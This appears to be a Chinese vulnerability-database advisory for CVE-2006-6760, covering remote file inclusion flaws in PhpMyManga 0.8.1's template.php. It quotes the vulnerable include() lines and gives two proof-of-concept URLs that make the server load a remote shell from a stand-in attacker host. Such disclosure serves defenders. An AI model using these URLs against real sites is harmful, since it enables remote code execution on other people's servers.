Laurent FALLET phpMyAnime 'template.php'多个远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111304 漏洞类型 代码注入
发布时间 2006-10-16 更新时间 2007-01-02
CVE编号 CVE-2006-6760 CNNVD-ID CNNVD-200612-522
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2578
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-522
|漏洞详情
LaurentFALLETphpMyAnime(phpmymanga)0.8.1及更早版本中的template.php存在多个PHP远程文件包含漏洞,远程攻击者可以通过在(1)actionsPage或(2)formPage参数内的URL来执行任意PHP代码。
|漏洞EXP
+-------------------------------------------------------------------------------------------
+ PhpMyManga <= 0.8.1 (template.php) Multiple File Include Vulnerabilities
+-------------------------------------------------------------------------------------------
+ Affected Software .: PhpMyManga <= 0.8.1
+ Vendor ............: http://phpmanga.sourceforge.net/
+ Description .......: "PhpMyManga is a web-based application for cataloging your collection of mangas."
+ Class .............: Remote File Inclusion
+ Risk ..............: High (Remote File Execution)
+ Found By ..........: nuffsaid <nuffsaid[at]newbslove.us>
+-------------------------------------------------------------------------------------------
+ Details:
+ Input passed to the 'actionsPage' or 'formPage' parameter in template.php is not sanitized
+ before being used to include files.
+ 
+ Vulnerable Code:
+ template.php, line(s) 97-99: if (isSet($actionsPage)) { include($actionsPage); }
+ template.php, line(s)   115: include($formPage);
+ 
+ Proof Of Concept:
+ http://[target]/[path]/template.php?actionsPage=http://evilsite.com/shell.php?
+ http://[target]/[path]/template.php?formPage=http://evilsite.com/shell.php?
+-------------------------------------------------------------------------------------------

# milw0rm.com [2006-10-16]
|参考资料

来源:BID
名称:20572
链接:http://www.securityfocus.com/bid/20572
来源:phpmanga.sourceforge.net
链接:http://phpmanga.sourceforge.net/index.php
来源:XF
名称:phpmymanga-template-file-include(29588)
链接:http://xforce.iss.net/xforce/xfdb/29588
来源:MILW0RM
名称:2578
链接:http://www.milw0rm.com/exploits/2578
来源:MILW0RM
名称:2578
链接:http://milw0rm.com/exploits/2578